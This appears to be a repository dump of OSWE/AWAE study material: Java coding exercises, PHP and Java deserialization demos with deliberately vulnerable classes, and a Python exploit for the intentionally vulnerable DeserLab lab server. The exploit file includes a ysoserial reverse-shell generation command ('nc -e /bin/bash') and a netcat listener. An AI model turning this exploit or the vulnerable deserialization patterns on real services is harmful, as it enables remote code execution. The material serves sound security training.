32 | int[] arr3 = new int[]{3, 3, -2, 408, 3, 3};
33 |
34 | System.out.println(Arrays.toString(cumulativeSum(arr1)));
35 | System.out.println(Arrays.toString(cumulativeSum(arr2)));
36 | System.out.println(Arrays.toString(cumulativeSum(arr3)));
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/XSS and MySQL/README.md:
--------------------------------------------------------------------------------
1 | # XSS and MySQL (NO SQLMAP ALLOWED)
2 |
3 | This exercise details the exploitation of an XSS vulnerability in a PHP based application and how an attacker can leverage it to gain access to administrative pages; from there leveraging a SQL injection vulnerability to gain full code execution.
4 |
5 | ## Personal Note
6 |
7 | It's important you understand how this attack works and the importance of weaponization; in a real scenario many companies may be running this application and you want to have an exploit you can just launch. In the AWAE we will likely be chaining bugs to get pre-auth RCE, and this is a perfect example to practice this skill. I went ahead and used JavaScript, but the exploit can be automated further using Python to POST the comment. Feel free to use my POC; however, I recommend you don't cheat and develop it on your own. Best of luck 😄!
8 |
9 | ## Links
10 |
11 | - https://pentesterlab.com/exercises/xss_and_mysql_file/course
12 | - https://pentesterlab.com/exercises/xss_and_mysql_file/iso
13 |
--------------------------------------------------------------------------------
/Edabit/java/thirteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a function that takes a string, checks if it has the same number
4 | of 'x's and 'o's and returns either true or false.
5 |
6 | */
7 |
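public class Program
{
    /**
     * Count how often {@code c} occurs in {@code str1}, comparing against the
     * lower-cased form of {@code str1}.
     *
     * @param str1 text to scan; must not be null
     * @param c    character to look for; pass it in lower case, because only
     *             the text is lower-cased, never {@code c}
     * @return number of positions in the lower-cased text equal to {@code c}
     */
    public static int matchesCount(String str1, char c)
    {
        // Lower-case once up front rather than once per loop iteration.
        String lowered = str1.toLowerCase();
        int count = 0;

        for (int i = 0; i < lowered.length(); i++)
            if (lowered.charAt(i) == c)
                count++;

        return count;
    }

    /**
     * Report whether {@code str} holds as many 'x' as 'o' characters,
     * ignoring case. A string with neither letter counts as balanced.
     *
     * @param str text to inspect; must not be null
     * @return true when both counts are equal
     */
    public static boolean getXO(String str)
    {
        return matchesCount(str, 'x') == matchesCount(str, 'o');
    }

    public static void main(String[] args)
    {
        System.out.printf("ooxx = %b\n", getXO("ooxx"));
        System.out.printf("xooxx = %b\n", getXO("xooxx"));
        System.out.printf("ooxXm = %b\n", getXO("ooxXm"));
        System.out.printf("zpzpzpp = %b\n", getXO("zpzpzpp"));
        System.out.printf("zzoo = %b\n", getXO("zzoo"));
    }
}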
36 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task21-multi_level_xml.js:
--------------------------------------------------------------------------------
1 |
23 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-two.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of names and returns
4 | an array with the first letter capitalized.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
10 | public class Program
11 | {
12 | public static String[] capMe(String[] s)
13 | {
14 | String[] nstr_arr = new String[s.length];
15 |
16 | for (int i = 0; i < s.length; i++)
17 | {
18 | char[] arr = s[i].toCharArray();
19 | for (int j = 0; j < arr.length; j++) {
20 | arr[0] = Character.toUpperCase(arr[0]);
21 | arr[j] = Character.toLowerCase(arr[j]);
22 | }
23 | nstr_arr[i] = new String(arr);
24 | }
25 |
26 | return nstr_arr;
27 | }
28 |
29 | public static void main(String[] args)
30 | {
31 | System.out.println(
32 | Arrays.toString(
33 | capMe(new String[]{"mavis", "senaida", "letty"})
34 | )
35 | );
36 | System.out.println(
37 | Arrays.toString(
38 | capMe(new String[]{"samuel", "MABELLE", "letitia", "meridith"})
39 | )
40 | );
41 | }
42 | }
43 |
--------------------------------------------------------------------------------
/Understanding PHP Object Injection/ser-magic-funcs.php:
--------------------------------------------------------------------------------
1 | variable."\n";
10 | }
11 | public function __construct() { // runs on `new Test()` (step 1 below)
12 | echo "__construct\n";
13 | }
14 | public function __destruct() { // runs when an object is destroyed; step 5 below notes it fires for the unserialized copy as well
15 | echo "__destruct\n";
16 | }
17 | public function __wakeup() { // called by unserialize() on the rebuilt object; its properties come from the serialized string, __construct is not run
18 | echo "__wakeup\n";
19 | }
20 | public function __sleep() { // called by serialize(); returns the names of the properties to include in the output
21 | echo "__sleep\n";
22 | return ['variable', 'variable2'];
23 | }
24 | }
25 | $obj = new Test(); // 1. Create an object; will call __construct
26 | $ser = serialize($obj); // 2. serialize() object; will call __sleep
27 |
28 | // print serialized string
29 | echo "Serialize Object: ".$ser."\n";
30 | // NOTE(review): $ser was produced by this script, so it is trusted here; for input from outside, pass ['allowed_classes' => false] (PHP 7+) or use a data-only format such as JSON
31 | $obj2 = unserialize($ser); // 3. unserialize() object string, will call __wakeup
32 | $obj2->PrintVariable(); // 4. call PrintVariable, will echo BUZZ
33 | // 5. PHP script end; call __destruct for both objects
34 |
35 | ?>
36 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-one.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Usually when you sign up for an account to buy something, your credit card number, phone number or answer to a secret question is partially obscured in some way. Since someone could look over your shoulder, you don't want that shown on your screen. Hence, the website masks these strings.
4 |
5 | Your task is to create a method that takes a string, transforms all but the last four characters into "#" and returns the new masked string.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
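public class Program
{
    /**
     * Mask all but the last four characters of {@code s} with '#'.
     *
     * Strings of four characters or fewer are returned unchanged, so a short
     * value is shown in full; callers that must never display a whole secret
     * need their own minimum-length rule.
     *
     * @param s value to mask; must not be null
     * @return the masked string, same length as {@code s}
     */
    public static String maskify(String s)
    {
        int masked = s.length() - 4;

        if (masked <= 0)
            return s;

        char[] chars = s.toCharArray();
        // Overwrite the leading characters in place; the last four stay as-is.
        Arrays.fill(chars, 0, masked, '#');

        return new String(chars);
    }

    public static void main(String[] args)
    {
        System.out.printf("%s\n", maskify("123456"));
    }
}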
37 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/LogFile.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | // Vulnerable Class: deserializing a LogFile writes a file whose path and content both come from the serialized stream
4 | class LogFile implements Serializable
5 | {
6 | public String filename; // restored from the stream; used unchecked as the output path in readObject()
7 | public String filecontent; // restored from the stream; written verbatim to that path
8 | // NOTE(review): a safer design keeps readObject() free of side effects and validates the fields; callers can also restrict classes with an ObjectInputFilter (Java 9+)
9 | // function called during deserialization: ObjectInputStream invokes this private hook while the object is being rebuilt, before the caller gets the result back
10 | private void readObject(ObjectInputStream in)
11 | {
12 | System.out.println("readObject from LogFile");
13 |
14 | try
15 | {
16 | // deserialize data: fills filename and filecontent from the stream
17 | in.defaultReadObject();
18 | System.out.printf("File name: %s, File content: %s\n",
19 | filename, filecontent
20 | );
21 | // do something useful with the data and restore
22 | // LogFile, write file content to filename
23 | FileWriter file = new FileWriter(filename); // no allow-list, base-directory or canonical-path check on filename
24 | BufferedWriter out = new BufferedWriter(file);
25 |
26 | System.out.println("Restoring log data to a file...");
27 | out.write(filecontent);
28 | // NOTE(review): if write() throws, neither close() below runs; try-with-resources would release both
29 | out.close();
30 | file.close();
31 | }
32 | catch (Exception e) // every failure is printed and swallowed, so deserialization still completes
33 | {
34 | System.out.printf("Exception: %s\n", e.toString());
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/LogFile.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | // Vulnerable Class: deserializing a LogFile writes a file whose path and content both come from the serialized stream
4 | class LogFile implements Serializable
5 | {
6 | public String filename; // restored from the stream; used unchecked as the output path in readObject()
7 | public String filecontent; // restored from the stream; written verbatim to that path
8 | // NOTE(review): a safer design keeps readObject() free of side effects and validates the fields; callers can also restrict classes with an ObjectInputFilter (Java 9+)
9 | // function called during deserialization: ObjectInputStream invokes this private hook while the object is being rebuilt, before the caller gets the result back
10 | private void readObject(ObjectInputStream in)
11 | {
12 | System.out.println("readObject from LogFile");
13 |
14 | try
15 | {
16 | // deserialize data: fills filename and filecontent from the stream
17 | in.defaultReadObject();
18 | System.out.printf("File name: %s, File content: %s\n",
19 | filename, filecontent
20 | );
21 | // do something useful with the data and restore
22 | // LogFile, write file content to filename
23 | FileWriter file = new FileWriter(filename); // no allow-list, base-directory or canonical-path check on filename
24 | BufferedWriter out = new BufferedWriter(file);
25 |
26 | System.out.println("Restoring log data to a file...");
27 | out.write(filecontent);
28 | // NOTE(review): if write() throws, neither close() below runs; try-with-resources would release both
29 | out.close();
30 | file.close();
31 | }
32 | catch (Exception e) // every failure is printed and swallowed, so deserialization still completes
33 | {
34 | System.out.printf("Exception: %s\n", e.toString());
35 | }
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-four.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a Map and return
4 | the values as a separate array.
5 |
6 | We could have also done the following...
7 |
8 | ```
9 | return dict.values().toArray(new String[0]);
10 | ```
11 |
12 | */
13 |
14 | import java.util.*;
15 |
16 | public class Program
17 | {
18 | public static String[] getValues(Map dict)
19 | {
20 | Set set = dict.entrySet(); // Get a set of entries
21 | Iterator i = set.iterator(); // Get an iterator
22 | String[] final_arr = new String[dict.size()];
23 |
24 | int j = 0; // write key values 2 list
25 | while(i.hasNext())
26 | {
27 | Map.Entry e = (Map.Entry)i.next();
28 | final_arr[j++] = e.getValue().toString();
29 | }
30 | return final_arr;
31 | }
32 |
33 | public static void main(String[] args)
34 | {
35 | Map map = new HashMap();
36 | map.put("a", "1");
37 | map.put("b", "2");
38 | map.put("c", "3");
39 |
40 | System.out.printf("%s\n",
41 | Arrays.toString(getValues(map))
42 | );
43 | }
44 | }
45 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/decipher.txt:
--------------------------------------------------------------------------------
1 | # tshark -r vuln_traffic.pcapng -T fields -e tcp.srcport -e data -e tcp.dstport -E separator=,
2 | 47844,aced0005,54 # Client sends STREAM_MAGIC and STREAM_VERSION for serialization
3 | 54,aced0005,47844 # Server acknowledges the use of STREAM_MAGIC & STREAM_VERSION
4 | 54,7704,47844 # Server tells client to prepare for a TC_BLOCKDATA of 0x04 bytes
5 | 54,f000baaa,47844 # Server sends 4 byte hello
6 | 47844,7704,54 # Client tells server to prepare for a TC_BLOCKDATA of 0x04 bytes
7 | 47844,f000baaa,54 # Client sends 4 byte hello
8 | 54,7702,47844 # Server tells client to prepare for a TC_BLOCKDATA of 0x02 bytes
9 | 54,0101,47844 # Server sends client 2 byte version number
10 | 47844,7702,54 # Client tells server to prepare for a TC_BLOCKDATA of 0x02 bytes
11 | 47844,0101,54 # Client sends server 2 byte version number
12 | 47844,7709,54 # Client tells server to prepare for TC_BLOCKDATA of 0x09 bytes
13 | 47844,,54 # Client sends server client name, along with length of name
14 | 47844,,54 # Client sends server string to be hashed
15 |
--------------------------------------------------------------------------------
/Edabit/java/thirty-three.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes a single string as argument and returns
4 | an ordered array containing the indexes of all capital letters in
5 | the string.
6 |
7 | */
8 |
9 | import java.util.*;
10 |
11 | public class Program
12 | {
13 | public static int[] indexOfCaps(String s)
14 | {
15 | char[] arr = s.toCharArray();
16 | int ct = 0;
17 | int i = 0;
18 |
19 | for (i = 0; i < arr.length; i++)
20 | if (Character.isUpperCase(arr[i]))
21 | ct++;
22 | int d_arr[] = new int[ct];
23 |
24 | i = 0;
25 | for (int j = 0; j < arr.length; j++)
26 | if (Character.isUpperCase(arr[j]))
27 | d_arr[i++] = j;
28 |
29 | return d_arr;
30 | }
31 |
32 | public static void main(String[] args)
33 | {
34 | System.out.println(Arrays.toString(indexOfCaps("eDaBiT")));
35 | System.out.println(Arrays.toString(indexOfCaps("eQuINoX")));
36 | System.out.println(Arrays.toString(indexOfCaps("determine")));
37 | System.out.println(Arrays.toString(indexOfCaps("STRIKE")));
38 | System.out.println(Arrays.toString(indexOfCaps("sUn")));
39 | }
40 | }
41 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-eight.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts an array of two strings and checks if
4 | the letters in the second string are present in the first string.
5 |
6 | */
7 |
8 | import java.util.*;
9 |
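public class Program
{
    /**
     * Count how often {@code c} occurs in {@code str1}, comparing against the
     * lower-cased form of {@code str1}.
     *
     * @param str1 text to scan; must not be null
     * @param c    character to look for; pass it in lower case, because only
     *             the text is lower-cased, never {@code c}
     * @return number of positions in the lower-cased text equal to {@code c}
     */
    public static int matchesCount(String str1, char c)
    {
        // Lower-case once up front rather than once per loop iteration.
        String lowered = str1.toLowerCase();
        int count = 0;

        for (int i = 0; i < lowered.length(); i++)
            if (lowered.charAt(i) == c)
                count++;
        return count;
    }

    /**
     * Check that every letter of {@code s[1]} appears somewhere in
     * {@code s[0]}, ignoring case. Repeated letters need only one match.
     *
     * @param s array whose first two elements are the haystack and the
     *          letters to look for; both must be non-null
     * @return true when no letter of {@code s[1]} is missing from {@code s[0]}
     *         (an empty {@code s[1]} is trivially true)
     */
    public static boolean letterCheck(String[] s)
    {
        String haystack = s[0].toLowerCase();
        char[] needed = s[1].toLowerCase().toCharArray();

        // Stop at the first missing letter instead of counting every match.
        for (char letter : needed)
            if (haystack.indexOf(letter) < 0)
                return false;
        return true;
    }

    public static void main(String[] args)
    {
        System.out.printf("%b\n", letterCheck(new String[]{"trances", "nectar"}));
        System.out.printf("%b\n", letterCheck(new String[]{"compadres", "DRAPES"}));
        System.out.printf("%b\n", letterCheck(new String[]{"parses", "parsecs"}));
    }
}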
40 |
--------------------------------------------------------------------------------
/Edabit/java/sixteen.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Christmas Eve is almost upon us, so naturally we need to prepare
4 | some milk and cookies for Santa! Create a method that accepts a
5 | GregorianCalendar object and returns true if it's Christmas Eve
6 | (December 24th) and false otherwise.
7 |
8 | Note:
9 | could have just compared to return val for example 11...
10 |
11 | */
12 |
13 | import java.util.GregorianCalendar;
14 |
15 | public class Program
16 | {
17 | public static boolean timeForMilkAndCookies(GregorianCalendar date)
18 | {
19 | GregorianCalendar daTime = new GregorianCalendar(2013, 11, 24);
20 |
21 | return (
22 | daTime.get(daTime.DATE) == date.get(date.DATE) &&
23 | daTime.get(daTime.MONTH) == date.get(date.MONTH)
24 | );
25 | }
26 |
27 | public static void main(String[] args)
28 | {
29 | GregorianCalendar ac = new GregorianCalendar(2013, 11, 24);
30 | GregorianCalendar bc = new GregorianCalendar(2013, 0, 23);
31 | GregorianCalendar cc = new GregorianCalendar(3000, 11, 24);
32 |
33 | System.out.printf("%b\n", timeForMilkAndCookies(ac));
34 | System.out.printf("%b\n", timeForMilkAndCookies(bc));
35 | System.out.printf("%b\n", timeForMilkAndCookies(cc));
36 | }
37 | }
38 |
--------------------------------------------------------------------------------
/Edabit/java/thirty.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that accepts a string of space separated numbers
4 | and returns the highest and lowest number (as a string).
5 |
6 | */
7 |
8 | import java.util.*;
9 |
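public class Program
{
    /**
     * Return the smallest value in {@code nums}.
     *
     * @param nums values to scan; must hold at least one element
     * @throws ArrayIndexOutOfBoundsException when {@code nums} is empty
     */
    public static int minVal(int[] nums)
    {
        int min = nums[0];

        // Element 0 already seeds the result, so start comparing at 1.
        for (int i = 1; i < nums.length; i++)
            if (nums[i] < min)
                min = nums[i];
        return min;
    }

    /**
     * Return the largest value in {@code nums}.
     *
     * @param nums values to scan; must hold at least one element
     * @throws ArrayIndexOutOfBoundsException when {@code nums} is empty
     */
    public static int maxVal(int[] nums)
    {
        int max = nums[0];

        for (int i = 1; i < nums.length; i++)
            if (nums[i] > max)
                max = nums[i];
        return max;
    }

    /**
     * Parse a whitespace-separated list of integers and return the highest
     * and lowest of them as {@code "<max> <min>"}.
     *
     * @param s text such as {@code "1 2 -3"}; must not be null
     * @return the maximum and minimum, separated by one space
     * @throws NumberFormatException when a token is not an integer (this
     *         includes an empty or blank {@code s})
     */
    public static String highLow(String s)
    {
        // Trim and split on runs of whitespace: a leading blank or a doubled
        // space used to yield an empty token and fail in parseInt.
        String[] tokens = s.trim().split("\\s+");
        int[] values = new int[tokens.length];

        for (int i = 0; i < values.length; i++)
            values[i] = Integer.parseInt(tokens[i]);

        return String.format("%s %s", maxVal(values), minVal(values));
    }

    public static void main(String[] args)
    {
        System.out.printf("%s\n", highLow("1 2 3 4 5"));
        System.out.printf("%s\n", highLow("1 2 -3 4 5"));
        System.out.printf("%s\n", highLow("1 9 3 4 -5"));
        System.out.printf("%s\n", highLow("13"));
    }

}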
49 |
--------------------------------------------------------------------------------
/Edabit/java/twenty-nine.java:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | Create a method that takes an array of doubles and returns the following statistics:
4 | - min val
5 | - max val
6 | - len val
7 | - avg val
8 |
9 | */
10 |
11 | import java.util.*;
12 |
13 | public class Program
14 | {
15 | public static double minVal(double[] nums)
16 | {
17 | double min = nums[0];
18 |
19 | for (int i = 0; i < nums.length; i++)
20 | if (nums[i] < min)
21 | min = nums[i];
22 | return min;
23 | }
24 |
25 | public static double maxVal(double[] nums)
26 | {
27 | double max = nums[0];
28 |
29 | for (int i = 0; i < nums.length; i++)
30 | if (nums[i] > max)
31 | max = nums[i];
32 | return max;
33 | }
34 |
35 | public static double avgVal(double[] nums)
36 | {
37 | double avg = 0;
38 |
39 | for (int i = 0; i < nums.length; i++)
40 | avg += nums[i];
41 | return (avg / nums.length);
42 | }
43 |
44 | public static double[] minMaxLengthAverage(double[] nums)
45 | {
46 | return new double[]{minVal(nums), maxVal(nums), nums.length, avgVal(nums)};
47 | }
48 |
49 | public static void main(String[] args)
50 | {
51 | System.out.printf("%s\n",
52 | Arrays.toString(minMaxLengthAverage(new double[]{6, 9, 15, -2, 92, 11}))
53 | );
54 | }
55 | }
56 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example/src/Utils.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | class Utils
4 | {
5 | // function to serialize an object and write it to a file
6 | public static void SerializeToFile(Object obj, String filename)
7 | {
8 | try
9 | {
10 | FileOutputStream file = new FileOutputStream(filename);
11 | ObjectOutputStream out = new ObjectOutputStream(file);
12 |
13 | // serialization of the object to file
14 | System.out.printf("Serializing %s to %s\n",
15 | obj.toString(), filename
16 | );
17 | out.writeObject(obj);
18 |
19 | out.close();
20 | file.close();
21 | }
22 | catch (Exception e)
23 | {
24 | System.out.printf("Exception: %s\n", e.toString());
25 | }
26 | }
27 | // function to deserialize an object from a file
28 | public static Object DeserializeFromFile(String filename)
29 | {
30 | Object obj = new Object();
31 |
32 | try
33 | {
34 | FileInputStream file = new FileInputStream(filename);
35 | ObjectInputStream in = new ObjectInputStream(file);
36 |
37 | // deserialization of the object to file
38 | System.out.printf("Deserializing from %s\n", filename);
39 | obj = in.readObject();
40 |
41 | in.close();
42 | file.close();
43 | }
44 | catch (Exception e)
45 | {
46 | System.out.printf("Exception: %s\n", e.toString());
47 | }
48 |
49 | return obj;
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/vuln_example2/src/Utils.java:
--------------------------------------------------------------------------------
1 | import java.io.*;
2 |
3 | class Utils
4 | {
5 | // function to serialize an object and write it to a file
6 | public static void SerializeToFile(Object obj, String filename)
7 | {
8 | try
9 | {
10 | FileOutputStream file = new FileOutputStream(filename);
11 | ObjectOutputStream out = new ObjectOutputStream(file);
12 |
13 | // serialization of the object to file
14 | System.out.printf("Serializing %s to %s\n",
15 | obj.toString(), filename
16 | );
17 | out.writeObject(obj);
18 |
19 | out.close();
20 | file.close();
21 | }
22 | catch (Exception e)
23 | {
24 | System.out.printf("Exception: %s\n", e.toString());
25 | }
26 | }
27 | // function to deserialize an object from a file
28 | public static Object DeserializeFromFile(String filename)
29 | {
30 | Object obj = new Object();
31 |
32 | try
33 | {
34 | FileInputStream file = new FileInputStream(filename);
35 | ObjectInputStream in = new ObjectInputStream(file);
36 |
37 | // deserialization of the object to file
38 | System.out.printf("Deserializing from %s\n", filename);
39 | obj = in.readObject();
40 |
41 | in.close();
42 | file.close();
43 | }
44 | catch (Exception e)
45 | {
46 | System.out.printf("Exception: %s\n", e.toString());
47 | }
48 |
49 | return obj;
50 | }
51 | }
52 |
--------------------------------------------------------------------------------
/JavaScript For Pentesters/Parsing/task19-multi_level_parsing.js:
--------------------------------------------------------------------------------
1 |
57 |
--------------------------------------------------------------------------------
/Understanding Java Deserialization/reversed-bytes.c:
--------------------------------------------------------------------------------
1 | // obtained from: https://docs.oracle.com/javase/7/docs/api/constant-values.html
2 | \xac\xed // -> Magic number identifying this is serialized data
3 | \x00\x05 // -> Protocol Version
4 | \x73 // -> we have a new object (TC_OBJECT)
5 | \x72 // -> Class description (TC_CLASSDESC)
6 | \x00\x07 // -> Length of class name
7 | \x4c\x6f\x67\x46\x69\x6c\x65 // -> Class name: LogFile
8 | \xd7\x60\x3d\xd7\x33\x3e\xbc\xd1 // -> Serial version UID: This is an identifier of the
9 | // class. This value can be specified in the class,
10 | // if not, it is generated automatically
11 | \x02 // -> Flag: class is serializable (SC_SERIALIZABLE)
12 | \x00\x02 // -> Number of variables in class
13 | \x4c // -> Type code/signature - class
14 | \x00\x0b // -> Length of the class variable: 11
15 | \x66\x69\x6c\x65\x63\x6f // -> Variable name: filecontent
16 | \x6e\x74\x65\x6e\x74
17 | \x74 // -> A string (TC_STRING)
18 | \x00\x12 // -> Length of class name
19 | \x4c\x6a\x61\x76\x61\x2f // -> Class name: Ljava/lang/String;
20 | \x6c\x61\x6e\x67\x2f\x53
21 | \x74\x72\x69\x6e\x67\x3b
22 | \x4c // -> Type code/signature - class
23 | \x00\x08 // -> Length of the class variable: 8
24 | \x66\x69\x6c\x65\x6e\x61\x6d\x65 // -> Variable name: filename
25 | \x71 // -> Reference to previous object (TC_REFERENCE)
26 | \x00\x7e\x00\x01 // -> Object reference ID. Referenced objects start
27 | // from 0x7E0000
28 | \x78 // -> End of block data for this object (TC_ENDBLOCKDATA)
29 | \x70 // -> NULL reference, we finished the "class description"
30 | // the data will follow
31 | \x74 // -> A string (TC_STRING)
32 | \x00\x11 // -> Length of string: 17
33 | \x4e\x6f\x20\x61\x63\x74\x69 // -> The string: "No actions logged"
34 | \x6f\x6e\x73\x20\x6c\x6f\x67
35 | \x67\x65\x64
36 | \x74 // -> A string (TC_STRING)
37 | \x00\x0b // -> Length of string: 11
38 | \x77\x65\x74\x77\x30\x72 // -> The string: "wetw0rk.log"
39 | \x6b\x2e\x6c\x6f\x67
40 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # AWAE PREP Layout
2 |
3 | This repository will serve as the "master" repo containing all trainings and tutorials done in preparation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses. Below you can see in what order I completed these challenges / courses.
4 |
5 | ## Prep Breakdown
6 |
7 | The following table shows notes, courses, challenges, and tutorials taken in preparation for the AWAE.
8 |
9 | | Order | Name | Type | Link |
10 | |--- | --- | --- | --- |
11 | | 1 | JavaScript For Pentesters | Course | https://www.pentesteracademy.com/course?id=11 |
12 | | 2 | Edabit (Javascript, Java, PHP) | Challenges | https://edabit.com/ |
13 | | 3 | Simple Object Oriented Language Examples | Notes | N/A (I just wrote simple templates)
14 | | 4 | From SQL Injection to Shell | Tutorial | https://pentesterlab.com/exercises/from_sqli_to_shell/ |
15 | | 5 | XSS and MySQL | Challenge | https://www.vulnhub.com/entry/pentester-lab-xss-and-mysql-file,66/ |
16 | | 6 | Understanding PHP Object Injection | Tutorial | https://securitycafe.ro/2015/01/05/understanding-php-object-injection/ |
17 | | 7 | /dev/random: Pipe | Challenge | https://www.vulnhub.com/entry/devrandom-pipe,124/ |
18 | | 8 | Understanding Java Deserialization | Tutorial | https://nytrosecurity.com/2018/05/30/understanding-java-deserialization/
19 | | 9 | Practicing Java Deserialization Exploits | Challenge/Tutorial | https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/ |
20 | | 10 | SQL Injection Attacks and Defense | Book | https://www.amazon.com/Injection-Attacks-Defense-Justin-Clarke/dp/1597499633 |
21 |
22 | ## Post Prep Breakdown
23 |
24 | Having completed the course, below is everything done in regards to prep before the exam. If you have not taken the AWAE and are considering taking it definitely do everything shown above, and read the source! I have provided README's in each directory and source code so you can see what I did. I cannot share extra miles .... so those will not be within the repository. Best of luck!
25 |
26 | - Complete all extra miles! I know some are harder than others but push through (one took me 8 days alone).
27 | - Be comfortable using every debugger shown within the course.
28 | - Understand Object Oriented Languages taught throughout the course. No need to be a master in each language, but be able to code something fast using existing libs.
29 | - Be comfortable crafting a full POC (as done throughout the entire course)
30 | - Look for vulnerabilities ;)
31 |
32 | This may not seem like much, but it's what I did for prep. My best advice is DO NOT OVERTHINK things and don't rush through it. It took me 2 attempts when it should have taken one, I was jumping around not documenting enough what I was trying (It's easy to create your own rabbit holes...). Slow down you have 48 hours!
33 |
--------------------------------------------------------------------------------
/Practicing Java Deserialization Exploits/exploit.py:
--------------------------------------------------------------------------------
1 | #/usr/bin/env python
2 | #
3 | # Exploit Title : Practicing Java Deserialization Exploits
4 | # Author : wetw0rk
5 | # Vulnerable Software : https://github.com/NickstaDB/DeserLab
6 | #
7 | # Usage : DeserLab is an intentionally vulnerable server that
8 | # is vulnerable to java deserialization. This exploit
9 | # leverages the vulnerability within the application.
10 | #
11 |
12 | import os
13 | import sys
14 | import socket
15 | import struct
16 |
17 | class serial_killer():
18 | # Client for the DeserLab handshake recorded in decipher.txt: stream header, hello, version, client name, then one serialized object. Python 2 only (print statements, str.encode('hex'), str passed to sendall).
19 | def __init__(self, rhost, rport): # creates the TCP socket; nothing is sent until connect()
20 | self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
21 | self.rhost = rhost
22 | self.rport = int(rport)
23 |
24 | def connect(self):
25 | '''
26 | Connect to the server, send the 4-byte serialization stream header, then run the hello, version and name steps
27 | '''
28 | self.sock.connect((self.rhost, self.rport))
29 | self.sock.sendall(
30 | '\xac\xed' # STREAM_MAGIC
31 | '\x00\x05' # STREAM_VERSION
32 | )
33 | print("[*] Got STREAM_MAGIC, and STREAM_VERSION: %s" %
34 | self.sock.recv(4).encode('hex'))
35 | # NOTE(review): the 4 bytes read back are only printed, never compared with ac ed 00 05
36 | # start normal traffic
37 | self.send_hello()
38 | self.send_version()
39 | self.send_name()
40 |
41 | def send_hello(self):
42 | '''
43 | We know based on the PCAP gathered to expect bytes 0x77, 0x04.
44 | Here we unpack the second byte as an unsigned char ('B') to get the block length.
45 | Based on 0x04 (and wireshark) we should get 0xf000baaa
46 | '''
47 | pkt = self.sock.recv(2) # \x77\x04 expected; recv() may return fewer bytes, which is not checked
48 | datalength = int(struct.unpack('B', pkt[1])[0])
49 | print("[*] Getting TC_BLOCKDATA (you had me at hello): %s" %
50 | self.sock.recv(datalength).encode('hex'))
51 |
52 | self.sock.sendall(
53 | '\x77' # TC_BLOCKDATA
54 | '\x04' # Length: 0x04
55 | '\xf0\x00\xba\xaa' # Contents: 0xf000baaa
56 | )
57 |
58 | def send_version(self):
59 | '''
60 | Once we receive the server version we send our client version
61 | '''
62 | pkt = self.sock.recv(2) # block header: TC_BLOCKDATA tag plus one length byte, same layout as in send_hello
63 | datalength = int(struct.unpack('B', pkt[1])[0])
64 | print("[*] More TC_BLOCKDATA (version from server): %s" %
65 | self.sock.recv(datalength).encode('hex'))
66 |
67 | self.sock.sendall(
68 | '\x77' # TC_BLOCKDATA
69 | '\x02' # Length: 0x02
70 | '\x01\x01' # Contents: 0x0101
71 | )
72 |
73 | def send_name(self):
74 | '''
75 | With the client version sent, we now send our client name
76 | '''
77 | print "[*] Sending TC_BLOCKDATA (our name)"
78 | self.sock.sendall(
79 | '\x77' # TC_BLOCKDATA
80 | '\x09' # Block length: 0x09 (2-byte name length + 7-byte name)
81 | '\x00\x07' # Name length: 0x07
82 | 'wetw0rk' # wetw0rk == 7 bytes
83 | )
84 |
85 | # java -jar ysoserial.jar Groovy1 'nc -e /bin/bash 127.0.0.1 12' > payload.bin
86 | def exploit(self, payload_file):
87 | '''
88 | With our client name sent, we send a string to hash, only
89 | this time we will send our payload
90 | '''
91 | payload = ""
92 | with open(payload_file, 'rb') as content_file:
93 | payload = content_file.read()
94 | # the first 4 bytes of the file are skipped; presumably the stream header (ac ed 00 05) that connect() already sent
95 | self.sock.sendall(payload[4:])
96 | print "[+] Exploitation was a SUCC-ess, payload triggered" # NOTE(review): printed unconditionally; no server response is read or checked first
97 | os.system("nc -lp 12")
98 |
99 | try:
100 | target = sys.argv[1]
101 | port = sys.argv[2]
102 | payloadf= sys.argv[3]
103 | except: # bare except: catches everything, though only a missing argument (IndexError) can occur here
104 | print "Usage ./%s " % sys.argv[0] # NOTE(review): the argument names look lost from this message; the values read above are target, port and payload file
105 | exit()
106 | # connect() performs the whole handshake before exploit() sends the contents of the payload file
107 | start = serial_killer(target, port)
108 | start.connect()
109 | start.exploit(payloadf)
110 |
--------------------------------------------------------------------------------